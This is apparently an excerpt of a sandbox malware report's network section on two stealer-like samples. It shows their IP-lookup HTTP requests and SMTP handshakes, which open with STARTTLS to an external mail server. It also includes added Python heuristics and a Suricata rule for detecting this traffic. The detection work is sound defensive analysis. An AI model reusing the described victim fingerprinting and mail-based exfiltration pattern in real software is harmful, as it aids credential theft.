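Sessions 0 and 1 show the two outcomes of the same IP-check behaviour from two different dropped binaries: hawkgoods.exe asks whatismyipaddress.com and is refused by Cloudflare (HTTP 403 with body "error code: 1020"), while Matiexgoods.exe asks checkip.dyndns.org and receives the sandbox's public address, 84.17.52.74. Every checkip.dyndns.org request also carries a User-Agent in which the ".NET CLR" token has no space before its version number, unlike a genuine IE 6 string. The script below is an added example, not part of the report or of Joe Sandbox: it parses the two exchanges (transcribed from the sessions above, with the Cloudflare headers shortened), classifies each the way an analyst reads it, and emits a Suricata rule for the malformed User-Agent, escaping the semicolons that would otherwise break the rule. The host list, the regex and the rule's msg, sid and classtype are this example's own choices.

```python
"""Classify the HTTP exchanges shown under "HTTP Packets" and derive a rule.

Added example; not part of the Joe Sandbox report. SESSION_0 and SESSION_1
are transcribed from sessions 0 and 1 above (Cloudflare headers shortened).
The classifier, the User-Agent heuristic and the Suricata rule are this
example's own, not something the report or Joe Sandbox emits.
"""
import re
from dataclasses import dataclass, field

# The User-Agent on every checkip.dyndns.org request in this report. A genuine
# IE 6 token reads ".NET CLR 1.0.3705"; here the space after "CLR" is missing.
ODD_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
MALFORMED_CLR = re.compile(r"\.NET CLR\d")
# Assumption: the public IP-lookup services seen in this report.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com",
                  "whatismyipaddress.com", "freegeoip.app"}
IP_IN_BODY = re.compile(r"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})")

# Session 0: hawkgoods.exe -> whatismyipaddress.com, blocked by Cloudflare.
SESSION_0 = (
    "GET / HTTP/1.1\r\nHost: whatismyipaddress.com\r\nConnection: Keep-Alive\r\n\r\n",
    "HTTP/1.1 403 Forbidden\r\nContent-Type: text/plain; charset=UTF-8\r\n"
    "Content-Length: 16\r\nServer: cloudflare\r\n\r\nerror code: 1020",
)
# Session 1: Matiexgoods.exe -> checkip.dyndns.org, answered with the public IP.
SESSION_1 = (
    f"GET / HTTP/1.1\r\nUser-Agent: {ODD_UA}\r\n"
    "Host: checkip.dyndns.org\r\nConnection: Keep-Alive\r\n\r\n",
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nServer: DynDNS-CheckIP/1.0.1\r\n"
    "Connection: close\r\nContent-Length: 103\r\n\r\n"
    "<html><head><title>Current IP Check</title></head><body>"
    "Current IP Address: 84.17.52.74</body></html>\r\n",
)


@dataclass
class HttpMessage:
    start_line: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def parse_http(raw: str) -> HttpMessage:
    """Minimal HTTP/1.1 message parser: start line, lower-cased header names, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    msg = HttpMessage(start_line=lines[0], body=body)
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            msg.headers[name.strip().lower()] = value.strip()
    return msg


def classify(request_raw: str, response_raw: str) -> dict:
    """Summarise one request/response pair the way an analyst reads it."""
    req, resp = parse_http(request_raw), parse_http(response_raw)
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent", "")
    status = int(resp.start_line.split()[1])
    ip_match = IP_IN_BODY.search(resp.body)
    # Cloudflare's "error code: 1020" means a firewall rule refused the request:
    # the lookup failed and the sample learned nothing from that session.
    blocked = (status == 403
               and resp.headers.get("server", "").lower() == "cloudflare"
               and "error code: 1020" in resp.body)
    return {
        "host": host,
        "status": status,
        "ip_check": host in IP_CHECK_HOSTS,
        "odd_user_agent": bool(MALFORMED_CLR.search(ua)),
        # Only a 200 with the DynDNS body hands the malware its egress address.
        "leaked_ip": ip_match.group(1) if status == 200 and ip_match else None,
        "blocked_by_cdn": blocked,
    }


def suricata_content(value: str) -> str:
    """Escape the characters Suricata's content keyword treats specially."""
    return value.replace("\\", "\\\\").replace('"', '\\"').replace(";", "\\;")


def suricata_rule(ua: str, sid: int) -> str:
    """Match the malformed CLR token; an unescaped ';' in content is a parse error."""
    return ("alert http $HOME_NET any -> $EXTERNAL_NET any "
            '(msg:"Outbound HTTP with malformed .NET CLR User-Agent (IP check)"; '
            "flow:established,to_server; http.user_agent; "
            f'content:"{suricata_content(ua)}"; '
            f"classtype:trojan-activity; sid:{sid}; rev:1;)")


if __name__ == "__main__":
    for session in (SESSION_0, SESSION_1):
        print(classify(*session))
    print(suricata_rule(ODD_UA, 1000001))
```

The `leaked_ip` field is deliberately tied to a 200 response: the report's session 0 shows that a request to an IP-check host is not the same as a successful check, and a detection that only looks at the outbound Host header would count both sessions alike.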


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.7 | 49788 | 216.146.43.70 | 80 | C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data
Feb 2, 2021 08:53:47.596793890 CET | 5141 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Feb 2, 2021 08:53:47.669477940 CET | 5141 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0.1
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 103
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.7 | 49789 | 216.146.43.70 | 80 | C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data
Feb 2, 2021 08:53:48.376410007 CET | 5143 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Feb 2, 2021 08:53:48.450817108 CET | 5144 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0.1
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 103
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.7 | 49732 | 131.186.113.70 | 80 | C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data
Feb 2, 2021 08:52:05.217569113 CET | 1040 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Feb 2, 2021 08:52:05.276901960 CET | 1040 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0.1
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 103
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 3
Source IP: 192.168.2.7   Source Port: 49734   Destination IP: 131.186.113.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:52:13.783994913 CET | 1046 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 2, 2021 08:52:13.845175028 CET | 1046 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.0.1
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 4
Source IP: 192.168.2.7   Source Port: 49735   Destination IP: 131.186.113.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:52:14.162292004 CET | 1049 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 2, 2021 08:52:14.221944094 CET | 1049 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.2.0
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 5
Source IP: 192.168.2.7   Source Port: 49736   Destination IP: 131.186.113.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:52:14.511794090 CET | 1051 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 2, 2021 08:52:14.571176052 CET | 1051 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.0.1
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 6
Source IP: 192.168.2.7   Source Port: 49769   Destination IP: 104.16.155.36   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\hawkgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:53:01.163186073 CET | 2529 | OUT
    GET / HTTP/1.1
    Host: whatismyipaddress.com
    Connection: Keep-Alive
Feb 2, 2021 08:53:01.225852966 CET | 2530 | IN
    HTTP/1.1 403 Forbidden
    Date: Tue, 02 Feb 2021 07:53:01 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Connection: keep-alive
    X-Frame-Options: SAMEORIGIN
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Set-Cookie: __cfduid=d8412a81e43270e1884d4cbba2a07a91d1612252381; expires=Thu, 04-Mar-21 07:53:01 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
    cf-request-id: 080354181000001f3177225000000001
    Server: cloudflare
    CF-RAY: 61b256067e711f31-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
    Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
    Data Ascii: error code: 1020


Session ID: 7
Source IP: 192.168.2.7   Source Port: 49777   Destination IP: 216.146.43.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:53:26.770868063 CET | 3778 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Feb 2, 2021 08:53:26.845346928 CET | 3778 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.0.1
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 8
Source IP: 192.168.2.7   Source Port: 49779   Destination IP: 216.146.43.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:53:28.295042992 CET | 3780 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 2, 2021 08:53:28.368408918 CET | 3781 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.0.1
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


Session ID: 9
Source IP: 192.168.2.7   Source Port: 49787   Destination IP: 216.146.43.70   Destination Port: 80
Process: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe

Timestamp | kBytes transferred | Direction | Data (indented lines)
Feb 2, 2021 08:53:46.745872021 CET | 5135 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Feb 2, 2021 08:53:46.820859909 CET | 5136 | IN
    HTTP/1.1 200 OK
    Content-Type: text/html
    Server: DynDNS-CheckIP/1.0.1
    Connection: close
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Length: 103
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.74</body></html>


HTTPS Packets

Timestamp: Feb 2, 2021 08:52:13.208453894 CET
Source IP: 104.21.19.200   Source Port: 443   Dest IP: 192.168.2.7   Dest Port: 49733
Certificate chain presented by the server:
    Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
    Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Not Before: Mon Aug 10 02:00:00 CEST 2020   Not After: Tue Aug 10 14:00:00 CEST 2021
    Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
    Not Before: Mon Jan 27 13:48:08 CET 2020   Not After: Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad

Timestamp: Feb 2, 2021 08:53:45.447184086 CET
Source IP: 104.21.19.200   Source Port: 443   Dest IP: 192.168.2.7   Dest Port: 49785
Certificate chain presented by the server:
    Subject: CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US
    Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Not Before: Mon Aug 10 02:00:00 CEST 2020   Not After: Tue Aug 10 14:00:00 CEST 2021
    Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
    Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
    Not Before: Mon Jan 27 13:48:08 CET 2020   Not After: Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 54328bd36c14bd82ddaa0c04b25ed9ad
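
The HTTP sessions above and the SMTP packets listed further down are raw sandbox records. The Python below is an added example, not part of the Joe Sandbox report and not code from the malware: it transcribes those records into a pipe-delimited form (a constructed sample, with the SMTP connections condensed into one) and runs analyst heuristics over them. On the HTTP side it flags a public-IP lookup service contacted by a binary running from the user's Temp directory, the IE6-era User-Agent string that no 2021 browser sends, and a burst of retries to one host; on the SMTP side it flags direct submission to an external MTA on port 587, the non-FQDN EHLO argument 830021, and the point at which STARTTLS hides the rest of the session. The host list, the retry threshold and the record format are assumptions of the example.

```python
"""Structure the flattened HTTP and SMTP tables of the sandbox report and run
a few analyst heuristics over them. Added example, not part of the report;
the record format, the host list and the thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Public-IP lookup services. Stealers query one to tag stolen data with the
# victim's external address; these two are the ones seen in the report.
# Assumption: an analyst-maintained list, extend it for your environment.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "whatismyipaddress.com"}
# A binary running from the user's Temp directory deserves extra scrutiny.
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Mail ports a workstation should not speak to directly (assumption).
SMTP_PORTS = {25, 465, 587}
RETRY_MIN, RETRY_WINDOW = 3, timedelta(seconds=60)   # burst threshold (assumption)
TS = "%Y-%m-%d %H:%M:%S.%f"

# Constructed sample transcribed from the HTTP session table:
# session|timestamp|process|dst ip:port|Host header|User-Agent|status
_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
_MX = r"C:\Users\user\AppData\Local\Temp\Matiexgoods.exe"
_HK = r"C:\Users\user\AppData\Local\Temp\hawkgoods.exe"
HTTP_LOG = "\n".join([
    f"2|2021-02-02 08:52:05.217|{_MX}|131.186.113.70:80|checkip.dyndns.org|{_UA}|200",
    f"3|2021-02-02 08:52:13.783|{_MX}|131.186.113.70:80|checkip.dyndns.org|{_UA}|200",
    f"4|2021-02-02 08:52:14.162|{_MX}|131.186.113.70:80|checkip.dyndns.org|{_UA}|200",
    f"5|2021-02-02 08:52:14.511|{_MX}|131.186.113.70:80|checkip.dyndns.org|{_UA}|200",
    f"6|2021-02-02 08:53:01.163|{_HK}|104.16.155.36:80|whatismyipaddress.com||403",
    f"7|2021-02-02 08:53:26.770|{_MX}|216.146.43.70:80|checkip.dyndns.org|{_UA}|200",
    f"8|2021-02-02 08:53:28.295|{_MX}|216.146.43.70:80|checkip.dyndns.org|{_UA}|200",
    f"9|2021-02-02 08:53:46.745|{_MX}|216.146.43.70:80|checkip.dyndns.org|{_UA}|200",
])
# Constructed sample from the SMTP table, condensed into one connection:
# timestamp|src ip|dst ip|dst port|direction (C=client, S=server)|line
SMTP_LOG = "\n".join([
    "2021-02-02 08:52:22.813|199.193.7.228|192.168.2.7|49740|S|220 PrivateEmail.com prod Mail Node",
    "2021-02-02 08:52:22.813|192.168.2.7|199.193.7.228|587|C|EHLO 830021",
    "2021-02-02 08:52:23.004|199.193.7.228|192.168.2.7|49740|S|250-AUTH PLAIN LOGIN",
    "2021-02-02 08:52:23.004|199.193.7.228|192.168.2.7|49740|S|250 STARTTLS",
    "2021-02-02 08:52:26.251|192.168.2.7|199.193.7.228|587|C|STARTTLS",
    "2021-02-02 08:52:26.441|199.193.7.228|192.168.2.7|49740|S|220 Ready to start TLS",
])


def parse_http(text):
    """Split the pipe-delimited sample into one dict per HTTP session."""
    rows = []
    for line in text.splitlines():
        sid, ts, proc, dst, host, ua, status = line.split("|")
        ip, port = dst.rsplit(":", 1)
        rows.append({"session": int(sid), "ts": datetime.strptime(ts, TS),
                     "process": proc, "dst": ip, "dport": int(port),
                     "host": host, "ua": ua, "status": int(status)})
    return rows


def analyze_http(rows):
    """Return (rule, detail) findings: IP-check lookups from a Temp binary,
    the fixed legacy User-Agent (once per process), and retry bursts."""
    findings, by_key, seen_ua = [], defaultdict(list), set()
    for r in rows:
        if r["host"] in IP_CHECK_HOSTS and USER_TEMP.search(r["process"]):
            findings.append(("ip_check_from_temp",
                             f"session {r['session']}: {r['process']} -> {r['host']} ({r['status']})"))
        # IE 6 on Windows Server 2003 in 2021 is a string compiled into the
        # client, not a browser; a 403 on the other lookup changes nothing.
        if "MSIE 6.0" in r["ua"] and r["process"] not in seen_ua:
            seen_ua.add(r["process"])
            findings.append(("legacy_user_agent", f"{r['process']}: {r['ua']}"))
        by_key[(r["process"], r["host"])].append(r["ts"])
    # Burst: RETRY_MIN or more requests to one host inside RETRY_WINDOW.
    for (proc, host), stamps in by_key.items():
        stamps.sort()
        for i in range(len(stamps) - RETRY_MIN + 1):
            if stamps[i + RETRY_MIN - 1] - stamps[i] <= RETRY_WINDOW:
                findings.append(("retry_burst", f"{proc} -> {host}: {len(stamps)} requests"))
                break
    return findings


def analyze_smtp(text):
    """Flag direct mail submission from a workstation, a non-FQDN EHLO, and
    the STARTTLS upgrade after which the capture no longer shows the payload."""
    findings, ehlo = [], None
    for line in text.splitlines():
        ts, src, dst, dport, direction, data = line.split("|")
        if direction == "C" and int(dport) in SMTP_PORTS and ehlo is None:
            findings.append(("direct_smtp", f"{src} -> {dst}:{dport}"))
        if data.upper().startswith("EHLO "):
            ehlo = data.split(None, 1)[1]
            if "." not in ehlo:      # RFC 5321 expects a FQDN or address literal
                findings.append(("non_fqdn_ehlo", ehlo))
        if direction == "S" and data.startswith("220 Ready to start TLS"):
            findings.append(("starttls_exfil_hidden",
                             f"{src}: credentials and message body after this point need TLS interception"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze_http(parse_http(HTTP_LOG)) + analyze_smtp(SMTP_LOG):
        print(f"{rule:22} {detail}")
```

Against the sample this yields eight IP-check findings (seven 200s from Matiexgoods.exe and the Cloudflare 403 from hawkgoods.exe, which still proves intent), one legacy User-Agent finding, one retry burst (four requests to checkip.dyndns.org within nine seconds), and the three SMTP findings. The "220 Ready to start TLS" line matters for scoping: everything the stealer sends after it (AUTH credentials, the harvested data) is encrypted on the wire, so recovering it needs a TLS-intercepting sandbox or memory capture, not just the pcap.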

SMTP Packets

Timestamp | Source IP:Port -> Dest IP:Port | Commands
Feb 2, 2021 08:52:22.813158989 CET | 199.193.7.228:587 -> 192.168.2.7:49740 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:22.813167095 CET | 199.193.7.228:587 -> 192.168.2.7:49741 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:22.813688993 CET | 192.168.2.7:49740 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:23.004148006 CET | 199.193.7.228:587 -> 192.168.2.7:49740 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:23.785701990 CET | 199.193.7.228:587 -> 192.168.2.7:49742 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:23.786706924 CET | 192.168.2.7:49742 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:23.980775118 CET | 199.193.7.228:587 -> 192.168.2.7:49742 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:25.029432058 CET | 199.193.7.228:587 -> 192.168.2.7:49743 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:25.030982018 CET | 192.168.2.7:49743 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:25.224092007 CET | 199.193.7.228:587 -> 192.168.2.7:49743 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:26.059046984 CET | 199.193.7.228:587 -> 192.168.2.7:49744 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:26.059510946 CET | 192.168.2.7:49744 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:26.250122070 CET | 199.193.7.228:587 -> 192.168.2.7:49744 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:26.251414061 CET | 192.168.2.7:49744 -> 199.193.7.228:587 | STARTTLS
Feb 2, 2021 08:52:26.441719055 CET | 199.193.7.228:587 -> 192.168.2.7:49744 | 220 Ready to start TLS
Feb 2, 2021 08:52:27.599121094 CET | 199.193.7.228:587 -> 192.168.2.7:49745 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:27.599586964 CET | 192.168.2.7:49745 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:27.791764021 CET | 199.193.7.228:587 -> 192.168.2.7:49745 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:28.954073906 CET | 199.193.7.228:587 -> 192.168.2.7:49746 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:28.984247923 CET | 192.168.2.7:49746 -> 199.193.7.228:587 | EHLO 830021
Feb 2, 2021 08:52:29.188302040 CET | 199.193.7.228:587 -> 192.168.2.7:49746 | 250-mta-13.privateemail.com
    250-PIPELINING
    250-SIZE 81788928
    250-ETRN
    250-AUTH PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 STARTTLS
Feb 2, 2021 08:52:29.188587904 CET | 192.168.2.7:49746 -> 199.193.7.228:587 | STARTTLS
Feb 2, 2021 08:52:29.390053034 CET | 199.193.7.228:587 -> 192.168.2.7:49746 | 220 Ready to start TLS
Feb 2, 2021 08:52:30.722702980 CET | 199.193.7.228:587 -> 192.168.2.7:49747 | 220 PrivateEmail.com prod Mail Node
Feb 2, 2021 08:52:30.723046064 CET | 192.168.2.7:49747 -> 199.193.7.228:587 | EHLO 830021
